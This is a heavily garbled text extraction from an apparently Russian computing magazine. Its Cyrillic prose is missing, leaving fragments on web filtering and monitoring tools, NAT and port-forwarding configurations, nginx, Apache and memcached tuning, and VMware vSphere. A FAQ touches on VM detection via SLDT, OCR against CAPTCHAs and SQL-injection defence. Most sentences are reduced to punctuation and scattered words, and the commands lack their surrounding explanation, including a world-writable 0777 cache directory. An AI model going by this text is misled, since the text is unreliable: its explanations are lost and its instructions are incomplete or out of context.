Remove advertisement and banners .
, ,
. , , ,
.
URL .
: , URL,
Web Filter ( ), ,
IP (, , ).
Social network; -.
, ,
. . ,
, , IP ( ), . KWF
.
- ( ActiveX, HTML JavaScript).
-, HTML.
, .
. X 08 /139/ 10
, ( 70),
. .
,
URL (*). ,
-, .
KWF . Kerio Web Filter, - ISS
Orange WebFilter.
58 -, . -
, 20
, , ,
. , .
, Kerio Web Filter .
FTP .
KWF , upload . ,
,
. : , IP-
, , FTP-.
, IM-
KWF . , login.icq.com, id.rambler.ru
URL, IM-. ,
IP , ,
][ 2009 .
,
, , Instant Messengers,
IP:
- Rambler ICQ: 81.19.64.0 - 81.19.66.255;
- icq-ws.rambler.ru: 81.19.69.0 - 81.19.70.255;
119
SYN/ACK
Windows
- ICQ: 64.12.0.0 - 64.12.255.255, 205.188.0.0 205.188.255.255
.
. (ICQ Deny), -> IP-,
Instant Messengers. .
. ,
.
. , , , ,
. , ail-
2041, 2042; Yahoo! Messenger 5000-5001, 5050; MSN 1863;
Jabber/Gtalk 5222, 5223; IRC 6667-6669.
.
P2P.
-P2P , .
,
P2P ( 120 ).
, ,
. , - -
007
: .
. ,
, - .
LanAgent (lanagent.ru). ,
, , . ,
, ,
.
, , ICQ e-mail, , ,
, . .
,
.
120
URL Kerio WinRoute

,
. P2P, ,
,
. , -P2P.
: , eDonkey, DC++, Gnutella, Kazaa
. , Kerio
DNS ( DNS) IP, . : vkontakte.
ru 127.0.0.1.
.
SURFANALYZER
SurfAnalyzer (surfanalyzer.ru) ,
,
. ,
,
, (.exe, .com,
.zip ..), , IM-, . , , , ,
.

e-mail ICQ. SurfAnalyzer , ,
, :
(Server) , - ( , ,
, IM),
( ), Firebird
; ;
(View)
e-mail, ICQ -;
(Admin)
,
.
SurfAnalyzer
- (UserGte, WinGate ..)
-
X 08 /139/ 10
URL ,
View. , ,
, . ,
:).
SurfAnalyser
SurfAnalyzer, . SurfAnalyzer.
SurfAnalyzer ,
Win2k/XP/2k3. : CPU 1.7 , 256 RAM 200 HDD.
; , Firebird,
. ServiceManager.
SurfAnalyzer Admin, Admin .
, IP.
.
-, (Web+ICQ),
SurfAnalyzer (
3128), POP3 SMTP, . ,
-. , -, .. IP- SurfAnalyzer.

. e-mail-,
SurfAnalyzer, . ,
.
, , Web + ICQ + Mail Agent. SurfAnalyzer IP, IP+.

, , IP- -. ,
, .
: . , MIME-.

. ,
.
MIME-/ . ,
SurfAnalyzer,
. -
URL, SurfAnalyzer.
, : ,
. , odnoklassniki. ,
. IP.
SurfAnalyzer
, ICQ + Mail Agent. ,
X 08 /139/ 10
TRAFFPRO
TraffPro (traffpro.ru)
.
, ( Panasonic LG), ,
, NAT, -,
c- Squid. IP,
, , LDAP/AD VPN.
. TraffPro Qt, MySQL,
gnuplot.
Linux, Windows Linux, -.
, Free-, .
,
.
Linux LAMP- (. ][ 12.2008) .
,

, . ,

. , Linux,
iptables (TraffPro iptables
/etc/traffpro/traffpro_rule.cfg).
LAN2NET FIREWALL
Lan2net NAT Firewall (lan2net.ru)
,
, ,
.
, , , Microsoft Small Business Specialist.
Lan2net ,
,
URL IP.
IP firewall
. () IP-.
, IP-
.
. URL,
.
'*',
, .
: *.mp3, *.avi, *.mpg .. z
LanAgent NetworkFilter
, , SurfAnalyzer
LanAgent NetworkFilter,
: ICQ, MSN, mail.ru
; ;
. , -.
.
121
SYN/ACK
j1m@synack.ru
,
, , , -/-, DNAT/PAT.
, .
, -
NAT.
IPv4
. ,
, , ,
, NAT.

IP-, ,
IP-.
, NAT', ,
, . , -, SMTP- FTP-,
IP- - . DNAT , -
. ,

. ,
, .
,
, Windows ,
.
, .
,
,
. :
, ,
,
.
WINDOWS
, , .
Windows.
NAT:
122
1. -> ,
, IP- -> NAT.
2. NAT .
3. ,
.
4. , (, ), .
LINUX
Linux ,
iptables/netfilter, .
DNAT,
PREROUTING.
:
iptables -t nat -A PREROUTING -p tcp --dst $GATE \
--dport $PORT -j DNAT --to-destination $SERVER:$PORT
$GATE , $PORT ,
$SERVER:$PORT . ,
, (
):
# echo 1 > /proc/sys/net/ipv4/ip_forward
:
$IPTABLES -t nat
--dport $PORT
$IPTABLES -t nat
--dport $PORT
-A
-j
-I
-j
PREROUTING -p tcp --dst $IP \

DNAT --to-destination $SERVER:$PORT
POSTROUTING -p tcp --dst $SERVER \
SNAT --to $IP
, .
iptables-, ,
, Debian, arno-iptables-firewall,

. , 80
192.168.0.100, NAT_TCP_
X 08 /139/ 10
FORWARD="80>192.168.0.100" /etc/arno-iptables-firewall/
firewall.conf :
$ sudo /etc/init.d/arno-iptables-firewall restart
FREEBSD
FreeBSD , NAT ( , ).
natd , ,
, ,
.
kernel nat, NAT,
FreeBSD. , ipfw.
, , . kernel nat
FreeBSD ,
, ,
. ,
: natd, divert --. NAT
natd :
1. natd ipfw /etc/rc.conf:
# vi /etc/rc.conf
# natd
natd_enable="YES"
# rl0
natd_interface="rl0"
natd_flags="-f /etc/natd.conf"
# ipfw
firewall_enable="YES"
firewall_type="/etc/ipfw.conf"
2. NAT /etc/natd.conf:
# vi /etc/natd.conf
same_ports yes
X 08 /139/ 10
use_sockets yes
# :
# ---: --
redirect_port tcp 192.168.0.100:80 80
3. , (rl1) ,
natd , divert
/etc/ipfw.conf:
ipfw add divert natd ip from any to any in via rl1
:
ipfw allow tcp from any to 192.168.0.100 \
dst-port 80 in via rl0 setup
.
: NAT. NAT ,
- .
, ,
80-
:
# vi /etc/ipfw.conf
# NAT
nat 1 config log if rl1 reset same_ports \
redirect_port tcp 192.168.0.100:80 80
# NAT
add nat 1 ip from any to any via rl1
'nat' , , natd. ,
same_ports NAT
( RPC-). rdirect_port
, /etc/natd.conf.
123
SYN/ACK
DD-Wrt
OPENBSD
,
OpenBSD. NAT
pf,
ipfw , , iptables.
80- pf :
# vi /etc/pf.conf
# NAT
nat on rl1 from 192.168.10.0/24 to any -> $out_ip
#
rdr on rl1 inet proto { tcp, udp } from any \
to $out_ip port 80 -> 192.168.0.100
, rl1 , 192.168.0.100
, out_ip .
, , 80-,
port
.
, , ,
- :
rdr on rl1 inet proto { tcp, udp } from any \
to $out_ip port 5000:10000 -> 192.168.0.100
. .: , bittorrent:
rdr on $ext_if inet proto tcp from any to $ext_if \
port 6881:6889 -> $myhost port 6881:6889
pass in quick on $ext_if inet proto tcp from any \
to $myhost port 6880 >< 6890 keep state
,
,
.
: pass -
Universal Plug and Play (UPnP) ,

.
,

. .
124

D-Link DIR-300
rdr ,
,
(.
SQL-).
.
, OpenBSD 4.7
:
pass out on rl1 from 192.168.0.0/24 to any \
nat-to $out_ip
pass in on rl1 proto tcp from any to any \
port 80 rdr-to 192.168.0.100
CISCO

Cisco. , ,
, , .
, Cisco PIX (Private Internet Exchange)
ASA (Adaptive Security Appliance)
:
static (inside,outside) tcp 1.2.3.4 www \
192.168.0.100 www netmask 255.255.255.255
, Cisco IOS, :
ip nat inside source static tcp 192.168.0.100 80 \
1.2.3.4 80
80
192.168.0.100 1.2.3.4.
, /
.
OPENWRT DD-WRT
, Cisco

. - , D-Link,
ASUS, Linksys .
OpenWrt, X-Wrt DD-wrt,
X 08 /139/ 10
OpenBSD, pf NAT
, ,
Destination Ports, . Save.
,
/etc/config/firewall :
forward:proto=tcp dport=80:192.168.0.100:80
SQL-
. , .
DD-Wrt
-. ,
- (192.168.1.1),
NAT/QoS, . , ,
www, - , TCP
UDP, IP- , -
. , , .
, ,
(), ( VPN/PPTP).
, , ppp0, VPN/PPTP, .
DD-Wrt. .,
iptables:
iptables -t nat -A PREROUTING -p tcp -i ppp0 \
--dport 80 -j DNAT --to 192.168.0.100:80
. .
- X-Wrt,
, , OpenWrt.
Network, Firewall, New Rule
Forward Add. Forward To IP-
, Port
. Protocol
Add, : TCP UDP. ,
X 08 /139/ 10

, , ,
FreeBSD.
( , , Minix
:)). SSH.
, . , ,
. , NAT',
, . ,
-. SSH-,
. ? .
(serverip , gateway-ip ):
$ ssh -L 8080:<server-ip>:80 user@<gateway-ip>
, 8080 80 . -
localhost:8080, , . SSH-
SSH- ,
80 .
,
.
rinetd ,
.
Linux- BSD-.
/etc/rinetd.conf
(/usr/local/etc/rinetd.conf), :
1.2.3.4 80 192.168.0.100 80
() :
$ sudo /etc/init.d/rinetd restart
Ubuntu :
125
SYN/ACK
X-Wrt
# /usr/local/etc/rc.d/rinetd start
FreeBSD. FreeBSD rinetd

:
# echo "rinetd_enable="YES"" >> /etc/rc.conf
, 80 1.2.3.4,
IP-
192.168.0.100.
UNIX- socket
- inetd. ,
, . /etc/inetd.conf (
UDP-
NAT
pwnat (http://samy.pl/pwnat/)
, NAT-,
, NAT, .
, , pwnat.
192.168.0.2
HighID eDonkey-:
# vi /etc/pf.conf
rdr pass on $ext_if inet proto tcp
to any port 4661 -> 192.168.0.2
rdr pass on $ext_if inet proto tcp
to any port 4662 -> 192.168.0.2
rdr pass on $ext_if inet proto udp
to any port 4665 -> 192.168.0.2
rdr pass on $ext_if inet proto udp
to any port 4672 -> 192.168.0.2
126
Windows 2003 Server

xinetd,
) :
1 stream tcp nowait root /usr/local/bin/socket
socket 192.168.0.100 2
1 -, 2
192.168.0.100.
(www, ftp ..),
( ), /etc/services.
inetd kill -HUP
. , /etc/hosts.allow.
.
from any \
from any \
from any \
from any \
, DNAT ,
,
. ,

, . z
X 08 /139/ 10
SYN/ACK
j1m@synack.ru

-
- ,
. ,
, . , , ,
. ,
, .
- ,
. ,
,
. , , , .
,
, .
, -,
- -,
PHP' CMS. , . , ,
, . ,
,
( ). ,
.
, - .
:
Apache;
PHP;
eAccelerator;
Nginx -;
Memcached;
.
APACHE
- ,
, Apache. , HTTP-,
-,
-.
: Apache , . . , HTTP- :
Apache ,

( LoadModule). X 08 /139/ 10
,
.
Apache

. Apache2 , ,

MPM. - (Multi-processing module),
HTTP-. :
1. prefork MPM, -, Apache 1.3.
. ,
. .
2. worker MPM, .
, . .
prefork, .
3. event MPM. ,
, , nginx.
MPM, ( ).

Apache, MPM,
apache2-mpm.
Apache MaxClients.
,
, ,
,
. ,
, Apache, ( ps top).
HTTP-, Apache
keep-alive,
/ . Keep-alive ,
, CSS
.
, .
127
SYN/ACK
KeepAliveTimeout 5-10 , ,
, HTML/PHP,
keep-alive , KeepAlive
Off.
Apache . , , , ,
.
(, ,
GPRS), ,
, .
PHP
HTTP-, ,
-.
- PHP,
. /etc/php5/
apache2/php.ini ( Ubuntu,
) :
memory_limit -
.
.
display_errors = Off, error_log = /var/log/php log-. ,
.
upload_max_filesize post_max_size POST-. ,
-.
PHP-.
EACCELERATOR
PHP . , ,
, PHP-, . ,
,
. ,
128
eAccelerator,
PHP , . PHP-
( ).
eAccelerator ,
.
:
$ sudo apt-get install php5-dev build-essential
eAccelerator:
$ cd /tmp/
$ wget http://bart.eaccelerator.net/source/0.9.6.1/
eaccelerator-0.9.6.1.tar.bz2
$ tar xvjf eaccelerator-0.9.6.1.tar.bz2
$ cd eaccelerator-0.9.6.1
$ phpize
$ ./configure --enable-eaccelerator=shared
$ make
$ sudo make install
:
$ sudo mkdir -p /var/cache/eaccelerator
$ sudo chmod 0777 /var/cache/eaccelerator
, , eAccelerator PHP ( ):
# vi /etc/php5/apache2/php.ini
[PHP]
;
extension = "eaccelerator.so"
eaccelerator.enable = "1"
; ()
eaccelerator.shm_size = "64"
;
eaccelerator.cache_dir = "/var/cache/eaccelerator"
X 08 /139/ 10
Apache MPM- Ubuntu
phpinfo() eAccelerator
Nginx
;
eaccelerator.optimizer = "1"
;
eaccelerator.check_mtime = "1"
;
eaccelerator.debug = "0"
; ( )
eaccelerator.filter = ""
;
eaccelerator.shm_max = "0"
;
1 (3600 )
eaccelerator.shm_ttl = "3600"
eaccelerator.shm_prune_period = "0"
; ,
eaccelerator.shm_only = "0"
;
eaccelerator.compress = "1"
eaccelerator.compress_level = "9"
NGINX
, - , Apache .
Round robin DNS .

IP- .
, :
,
.
X 08 /139/ 10
, , HTTP-. Apache
, -
, ,
HTTP- , . HTTP- Nginx Apache
. Apache, Nginx
,
HTTP-.
,
(
HTTP-). Nginx ,
,
, Apache
Nginx . .
/etc/apache2/ports.conf :
NameVirtualHost *:81
Listen 81
Nginx:
$ sudo apt-get install nginx
:
# vi /etc/nginx/nginx.conf
# Nginx-
user www-data;
# Nginx-

worker_processes 1;
error_log /var/log/nginx/error.log;
pid /var/run/nginx.pid;
events {
worker_connections 1024;
}
http {
129
SYN/ACK
Memcached slab-
#
include /etc/nginx/mime.types;
default_type application/octet-stream;
server_names_hash_bucket_size 64;
access_log /var/log/nginx/access.log;
sendfile on;
#tcp_nopush on;
#keepalive_timeout 0;
keepalive_timeout 65;
tcp_nodelay on;
INFO
info

Gzip Deflate ,
Gzip-

.
Nginx Apache
#
gzip on;
gzip_proxied any;
gzip_min_length 1100;
gzip_http_version 1.0;
gzip_buffers 4 8k;
gzip_comp_level 9;
gzip_types text/plain text/css application/
x-javascript text/xml application/xml
application/xml+rss text/javascript;
include /etc/nginx/conf.d/*.conf;
include /etc/nginx/sites-enabled/*;
}
:
# vi /etc/nginx/sites-enabled/host.com
server {
listen 80;
server_name host.com;
access_log /var/log/nginx.access_log;
# Nginx
location ~* \.(jpg|jpeg|gif|png|css|js|zip|
tgz|gz|rar|bz2|doc|xls|exe|pdf|ppt|tar|wav|bm
p|rtf|swf|ico|flv|txt|xml|docx|xlsx)$ {
root /var/www/host.com/;
index index.html index.php;
access_log off;
expires 30d;
}
# .htaccess
location ~ /\.ht {
deny all;
}
#
Apache
location / {
proxy_pass http://127.0.0.1:81/;
proxy_set_header X-Real-IP $remote_addr;
proxy_set_header X-Forwarded-for $remote_
130
addr;
proxy_set_header Host $host;
proxy_connect_timeout 60;
proxy_send_timeout 90;
proxy_read_timeout 90;
proxy_redirect off;
proxy_set_header Connection close;
proxy_pass_header Content-Type;
proxy_pass_header Content-Disposition;
proxy_pass_header Content-Length;
}
}
, Apache Nginx:
$ sudo service apache2 restart
$ sudo service nginx restart
MEMCACHED
Memcached
, .

- , API. memcached
, , ,
, . -
PHP-,
( ) memcached,
- ( , nginx),

memcached. memcached
- ,
.
:
1. memcached:
$ sudo apt-get install memcached
2. server nginx
:
# vi /etc/nginx/nginx.conf
location / {
# memcached, URI
set $memcached_key $uri;
# memcached
memcached_pass 127.0.0.1:11211;
X 08 /139/ 10
-
Nginx :)
#
default_type text/html;
#
error_page 404 = /fallback;
}
location /fallback {
proxy_pass backend;
}
3. PHP memcache (
memcached):
$ sudo pecl install memcache
4. :
$ vi smaple.php
# memcached
ob_start();
$html = ob_get_clean();
$memcache->set($_SERVER['REQUEST_URI'], $html);
echo $html;
, ,
-. ,
. , , .
. .

SSI (Server Side Includes). SSI -
, -
. , SSI,
- :
# vi /var/www/index.php
<html>
<body>
memcached

memcached '-L'.

.
memcached

.
X 08 /139/ 10



</body>
</html>
,
auth.php, body.php.
,
. :
1. .
- nginx.
2. nginx index.php - (Apache), SSI- *2* -
(auth.php body.php).
3. , Apache PHP-
, ( ) body.php memcached.
4. nginx, index.
php .
5. , index.php - (, ,
nginx), Apache
auth.php, body.php memcached.
, SSI nginx ssi on,
location /. , auth.php ,
,
memcached.

-,
. ,
:
1. gzip deflate .
HTTP-: ngx_http_gzip_module
nginx, mod_compress lighttpd mod_deflate Apache.
2.
HTML JavaScript ( ,
.., , web-optimizator,
code.google.com/p/web-optimizator).
3. CSS JavaScript- ,
(
,
).
4. CSS , JavaScript .
6. Expires Cache-control,
CSS JavaScript .
7. JPG PNG , GIF (,
).z
131
SYN/ACK
grinder grinder@synack.ru
VMWARE VSPHERE

. - . , ,
VMware .
, : Microsoft, Oracle
Corporation, Parallels, VMware . ,
,
, - . ,
(SaaS, Software as a
service, ), ,
. VMware vSphere.
VSPHERE
VMware vSphere (www.vmware.com/products/
vsphere) , 2009 .
,
VMware Virtual Infrastructure,
. vSphere , ,
,
.
. . Google, Microsoft Azure Amazon,
, . vSphere

,
. ,
VMware,
.
,
:
VMware vStorage Thin Provisioning ; ;
VMware VMsafe ,
;
VMware API vStorage vCenter Data Recovery
VM ;
VMware Hot Add
;
VMware Distributed Power Management , ;
VMware Host Profiles , -
132
VMware ESX/ESXi . vNetwork,

,
VMware VMotion,
High Availability Fault Tolerance,
VMware DRS,
Storage VMotion. vSphere ,
(, )
(, Veeam Backup, www.veeam.com). CPU, RAM
(Resource Pool), (Reservation). , VMware,
VMware Compatibility Guide, Windows *nix. vSphere, Virtual
Infrastructure, ,
, (
); CPU.
6 ( Advanced Enterprise
Plus 12), .
, .
VMware vSphere :
VMware ESX / VMware ESXi (
);
VMware vCenter Server Agent, VMware vCenter Server ( VMware
VirtualCenter Server);
vCenter Server, , ( );
, ,
.
VMware
vSphere 4 update 2, .
VSPHERE
, ,
.

VM .
X 08 /139/ 10
vSphere,
:
VMware
Hardware Compatibility List;
VMware vSphere ESX/ESXi Server
(22 64 bit CPU, 2+ RAM, 2+
HDD);
VMware vCenter Server vSphere Client
ESX(i)-;
SAN;
.
,
( , SAN,
Active Directory ).
,
www.vmware.com/support/
pubs/vs_pubs.html.
vSphere, , . ,
,
ESX VMware ESXi, VMware vCenter Server (
ISO- zip-). : Server Heartbeat, Data Recovery (CD ISO)
vShield Zones. , ,
VMware ESXi, .
VMware ESX ESXi, , Linux ( ),
, .
: ,
.
, - vSphere Client. - ,
ESX(i) vCenter.
VMware vCenter
Windows.
, XP,
2k8R2. vCenter ,
(5 , 50 )
X 08 /139/ 10
Microsoft SQL Server 2005 Express,

.
. (
250), 32- . :

32- XP SQL Express,
64-
SQL-. ISO- zip-,

vCenter Server. , : vSphere Client, vCenter
Guided Consolidation, vCenter Update Manager, vCenter
Converter, vCenter Orchestrator VMware Consolidated
Backup. .

, , . , vCenter
-,
IIS . ,
: http,
https, LDAP, SSL, heartbeat. , , (.Net, J# .)
. vCenter
(Linked Mode)

. standalone
, vCenter Server Linked
Mode Options Join a VMware
vCenter Server group ...
vCenter. , ,
. ,
,
.
, vCenter Installer, , , . ,
, .
vCenter Update Manager (vCUM)
IP- vCenter .
, ,
HTTP://WWW
links
VMware
vSphere vmware.
com/products/vsphere

vSphere
vmware.com/
support/pubs/vs_pubs.
html.

64- CPU
CPU
Identification,
www.vmware.com/
download/shared_
utilities.html.
133
SYN/ACK
VMware ESXi
standalone- vCenter
Server
, , , VMware
Hardware Compatibility List (vmware.com/go/hcl). ,
-: VM Help (vm-help.com/
esx40i/esx40_whitebox_HCL.php), VMware's Communities
List (communities.vmware.com/cshwsw.jspa) Ultimate ESX
Whitebox (ultimatewhitebox.com).
- VMware Go

. :
Database Information , Windows-. ,
, ,
( 20 ).
Destination Folder Configure the location for downloading
patches. vSphere Client, , (
: Pentium II 300, 200 RAM 1 HDD).

. vSphere Client,
( Use Windows session credential
PowerShell
GUI,

. , ,
GUI. VMware
PowerShell PowerCLI (vmware.com/go/powercli).
,
Connect-VIServer, Get-VM Get-VICommand.
PowerShell. , , VMware Project Onyx
(blogs.vmware.com/vipowershell/2009/11/project-onyx-ishere.html), PowerShell-, VMware vSphere Client.
PowerCLI blogs.
vmware.com/vipowershell.
134
), .
. , , .
. Home Inventory Host and Clusters,
.
vSphere, Home.
:
Inventory , , datacenter,
;
Administration , , , vSphere, ;
Management ,
, .
, .
; - , ,
. -, - , vSphere
. , ,
. , .
,
. ,
. Administration Licensing,
Manage vSphere Licenses. Add License Keys. , Assign Licenses
Change License Key.
ESX(i).
DataCenter, .
DataCenter Add a host.
, IP /
; ,
.
. , . , Summary
. Configuration,
X 08 /139/ 10
INFO
info
vSphere Client
VM

, ,
.
. TCO/ROI-,
VM,
(TCO Total
Cost of Ownership , ROI Return on investment ).
VMware www.vmware.
com/calculator , , , ,
: , ,
.
:
( VMotion, iSCSI, NFS ), , .

. New Cluster,
. HA (High Availability)
DRS (Distributed Resource Scheduler). ,

.
, VM (Manual, Partially, Full
automated) ( Conservative Aggressive).
(DPM),
, EVC (Enhanced VMotion
Compatibility), -.
, EVC . ,
, , ,
SSE. ,
VMotion
, ? EVC
,
, VM . EVC AMD- Intel-.

. , ,
X 08 /139/ 10
vSphere
EVC . ,
. :
. ,
, Next .
Deploy
OVF Template, Open Virtualization Format
, (,
,
VMware OVF Tool). .
.
. Migrate
, .
,
,
- . vSphere
,
Administration Roles 9 , .

.

.
Fault Tolerance (VMFT,
, VM), Storage vMotion
(SVMotion, VM
), ,
.
(vmwareelearning.
blip.tv, youtube.com/user/VMwareKB, youtube.com/user/
VMwareELearning). z
vSphere
:
Standard, Advanced
Enterprise.

Essentials
Essentials Plus,

.

()
vNetwork

(
).

vSphere
.
VMware
Go (go.vmware.com)

VMware ESXi

.

vSphere
80,
389, 443, 636, 902/903,
8080 8443.
135
UNITS
Oriyana oriyana@xpsycho.ru
PSYCHO:

- ,
: , , , . , , , . , ,
,
, .
, .
?
,
, ;
,
, .
:). ,
, ,
.
, :
. ( :) );
;
( );
- , ;
,
;
. ,
, ,
.
,
.

,
, .
,
, . ,
136
, ,
,

,

.
, ,
.

.

.
. : ,
,
, . ,
, ;
. ,
,
, . .

( ,
. ,
- -
).
: , ,

.
,
30%
.
( , ):
,
, ,
. -
.
: ,
?.
:
, - -
10- . ,

,
,

.
.
, , -: , ,
. ,
,
X 08 /139/ 10
: ,
,
,
, :
: ,
?.

,
. : -

, .
, :

, .
.
, ,
.
,
,
,
.
, , .

,
- , , ,

. ;
.
, -;
,
.
-, .
: -, , . -
, 1-2 .
10
.
-, .

. , , ,
, , , - , ,
, ,
.
, . ,
,
X 08 /139/ 10
,
,
, , . , .
, 3 !
() ?

, ?
?
?
; , , .
?
,
.

, ,
, .
, ,
, .
: ,
, . .
, . , -.
, ,
.

,
.

(
) (
).

(-,
, ).

,
. 5
: 1.

,
.
, , ,
-..., ..
, ,
, ,
,
,
,
,

( , ..) , ,
, .

.
,
,
.
:).
137
UNITS
VS
. ? ,
.
, .
, / . , , , , .
,
.
.
, ,
: ,
.
,

,

. ,
100%. ,
,
:
,

, .

, .
.
. .
:
? , ?
, Delphi, ?
, .
,
. : -,
,
,
2 .
, ,
, ?
. ,
.
. ,
, ,
-
.
138

- : , , , , .
, ,
. , ,

,
. ,
( , );
, .

, ,
, ,
. ,
,

, . ,
- , ,
, , ,
,
,
, .
? ,
, :
. ,
, ?.
,
. ,
.
, -
-, ,

. ,
- , -
, .
(, IT-) ,
, ;
, ,
.
,
,

.
.

, -
, .
,
, ,
,
(
, ),
,
.
,
.

. ,
, , , .
, ;
, .
,
,
,
.
-.
: ,
,
. : ,

, .
, ,

, ,
,
.
: ,
, .

. ,
,
. .

,
, . , ,
.
,

- ,
.
:
, .

, , , .
,
.
X 08 /139/ 10
,
,
,
(,
):
, , ,
;
,
;
: , , , , ;
,
,
,
;
,
;
,
.
, .
.
:
-
,
.
= , ,
.
, .
,

. ,
, PR-
? ,
. ,
. ,
.
, .
:

, .
? :) ,
. , ,

X 08 /139/ 10
.

. , , ,
. ! ,

,
.
:
, ;

. ,
, , ;
( )
. ,
;
50- ,
( . !) .
,
.
(
) ,
, :
,
. :
?
:
1. ;
2. ;
3. .
:
1. , , , ?
2. ,
,
. ,

, ?
3.
,
,

, ,

,
,

( ! ?);
(
,

,
, ).
, , .
AOL Internet is a good
thing Internet is a bad thing (
YouTube ) ,
.
. ,
,
, . ,
, -
; .
.
,
;
.
.
- ; , .
, ,

.
-, , , ,
,
.
,
, ,

.
, ,
. ,
; , ,
, ,
, .
, , PR- (
PR, ),
, ,
.
.
. ][
:).z
139
UNITS
ant
faq
united
@real.xakep.ru
Q:
Windows
ProDiscover (www.techpathways.com/
DesktopDefault.aspx?tabindex=3&tabid=12).
/ egg- (
Python) :
,
.
Q:
Python'?
, , ,
A: , , , ,
setuptools. -
pypi.python.org/pypi/
setuptools.

:
1. setuptools easy_install,

exe.
.
.
2. :
easy_install [ ].
. ,
MAC (Modified, Access, and Change)

.
.
?
A: MFT (
, ),

mac-robber (www.sleuthkit.org).
mac-robber ,
MAC
. The Sleuth Kit
(TSK), .
: MFT, , TSK
140
easy_install example.com/path/to/
MyPackage-1.2.3.tgz.
Q: , PDF-
, , ,
.
.
A:
PDF Scanner (blogs.paretologic.
com/malwarediaries/CL_PDF_Scanner.zip).
PDF,
:
1. nothing found ( );
2. potential risk JavaScript code (
JS-, );
3. suspicious file (
, , , ). , ,
X 08 /139/ 10
malwaredomainlist.
com mdl.paretologic.com.
Q: , Skype - IRC.
?
A: Skype
IRC-. GUI-,
.
:
/add [username]
username .
/leave .
/topic [text] .
/get guidelines
guideline',
/kick [username]
.
/kickban [username] , kick
.
/set /set banlist
, .
/set /get allowlist
,
.
/setrole [username] MASTER | USER |
LISTENER
.
: Skype? CREATOR MASTER . USER
. LISTENER ,
.
Q:
,
HDD
#f00)
circle.attr("fill", "#f00");

Raphael , . ,
, ,
JavaScript ,
Flash. HTML 5.
Flash-
Silverlight-. ,
Q: PCAP-
JavaScript. ?
A: ,
,
Raphael (raphaeljs.com). W3G
SVG,
Vector Markup Language ( ). ,
, Raphael, DOM-.
JavaScript,
, .

:
// 320 x
200
10, 50
var paper = Raphael(10, 50, 320,
200);
// x,y
= (50, 40) = 10
var circle = paper.circle(50, 40,
10);
// (X 08 /139/ 10
A: , , .
.
,
IP-. , ,
,
nwmap (nwmap.sourceforge.net).
Nmap
Tshark.
Q: : embedded-, . ,
USB-
. - . NTFS, ,
, . , FAT ,
. , ?
A: , FAT/
FAT32.
,
.
HP USB Disk Storage Format Tool PE2USB.
,
Google.
Q: , .
,
( VMware
Workstation) .
.
.
,
?
A: ,
,
LDTR.
,
, . Windows
,
LDTR
. ,
VMware . :
LDTR, , ,

.
SLDT (Store
Local Descriptor Table Register),

ring-3 .
:

SLDT ,
.
Q: : CAPTCHA . ,
141
UNITS
,
$fname.
,
SQL Injection.
Interpolique, . :
$conn->query(eval(b('select * from
table where fname=^^fname;')));
b -
base64-
, ^^.
:
JavaScript
: l, 1, I. ,
, ?
Q:
: [A-Z][a-z][0-9]
.
, ,
:
,
. ,
,
. :
l, 1, I
;
W, w w v vv;
O,0, Q ,
;
g, 9 , ;
3, 8 B;
4 A;
5 S;
L V;
r n;
h n;
Y, y, v
.
,
.
Q:
CAPTCHA. -,
, ,
OCR, -
,
CAPTCHA?
A: , ,
, OCR-. ,
, ,
.
GOCR (jocr.sourceforge.net) OCR-,
142
. ,
, .
Tesseract (code.google.com/p/tesseract-ocr)
OCR-,
HP 1985 1995
. , ,
,
, GOCR.
ocropus (code.google.com/p/ocropus)
Tesseract , Google :). ,
, .
Gamera (ldp.library.jhu.edu/projects/gamera)
,
( CAPTCHA),
.
Q: , SQL-.
A: (, )
-.
WAF
][ (www.xakep.ru/magazine/xa/130/056/1.
asp). ,
, SQL-,
Interpolique.
,
DNS. Interpolique
,
, base64 .
?
,
.
,
.
:
$conn->query("select * from table
where fname=^^fname;");
select * from table where

fname=b64d("Veh.....=")
-
. fname ( , ),
-, , .
www.scribd.com/
doc/33001026/Interpolique. , ,

base64 MySQL.
PostgreSQL base64
encode/decode.
Q: SHSH, iPhone/iPad,
?
?
A: Apple , ,
, . ,
.
, firmware Apple
- , Jailbreak (
). iPhone, iPod Touch
iPad, iTunes
Apple,
ECID (
) .
SHSH

iBoot, .
iBoot , .
SHSH? :
Apple,

( Jailbreak),
,
.
,
SHSH, - Apple. SHSH TinyUmbrella
(thefirmwareumbrella.blogspot.com).z
X 08 /139/ 10
>Multimedia
Ashampoo Snap 4.0.0
Evernote 3.5.4
Flashcards 2.2.5
Fotobounce 3.0.3
Foxit Reader 4.0
GameSave Manager
Gimp 2.6.9
Google Earth 5.2
Gramps 3.2.3
>Misc
BatteryBar Free 3.4.1
CLCL 1.1.2
Folder Bookmarks 1.6.5.1
gMote 1.41
Launchy 2.5
Listary
OnTopReplica
Piles
Preme 0.92
TimeSheet 1.1.5
TriX 0.0.11.17
USB Stick Watcher 1.5
Windows 7 Shortcuts 0.4.2
>Dailysoft
7-Zip 4.65
DAEMON Tools Lite 4.35.6
Download Master 5.7.2.1217
Far Manager v2.0 build 1420 x86
FileZilla Client 3.3.3
Firefox 3.6.6
foobar2000 1.0.3
K-Lite Mega Codec Pack 6.10
Miranda 0.8.27
Nodepad++ 5.7
Opera 10.60
PuTTY 0.60
Skype 4.2
SysinternalsSuite ()
Total Commander 7.50a
Unlocker 1.8.9
Xakep CD DataSaver 6.0
XnView 1.97.6
>>WINDOWS
>Development
Adobe AIR 2.0
Diffuse 0.4.3
Eclipse 3.6
Enterprise Architect 8.0
Geany 0.19
Mockups For Desktop
Google App Engine SDK for Java
Google App Engine SDK for Python
HttpWatch 7.0
Inno Setup 5.3.10
jQueryPad
LINQPad
MySQL Community Server 5.1.48
MySQL Workbench 5.2.25
NetBeans 6.9
Python 2.7
WebStorm-RC-95.298
>>UNIX
>Desktop
DjVuSmooth 0.2.7
DockbarX 0.39.4
Enlightenment 1.0.2
>System
Acronis Drive Monitor Free
AVG Free Edition 9.0.839
BatteryCare 0.97
Beep Codes Viewer 0.0.1
Cobian Backup 10
DriveImage XML 2.14
FileSeek 1.9.8
HashMyFiles 1.68
HashTab 3.0
Ketarin 1.1
Monitor Asset Manager 2.5
RAMDisk 3.5
Sandboxie 3.46
Security Essentials 1.0.1963
SpyShelter Free
SSD Tweak Utility
UNetbootin 4.71
USB Safeguard 1.3
USB WriteProtector 1.1
VirtualBox 3.2.6
Watch 4 Folder 2.0
>Net
Adobe flash player 10.1
Aria2 1.9.5
CrossFTP 1.65a
EiskaltDC++ 2.0.3
Emesene 1.6.2
Empathy 2.30.2
Google Chrome 5.0.375.86
Googlecl 0.9.8
Googsystray 1.2.0
KDropbox 0.3.0
LimeWire 5.5.10
Mozilla Firefox 3.6.6
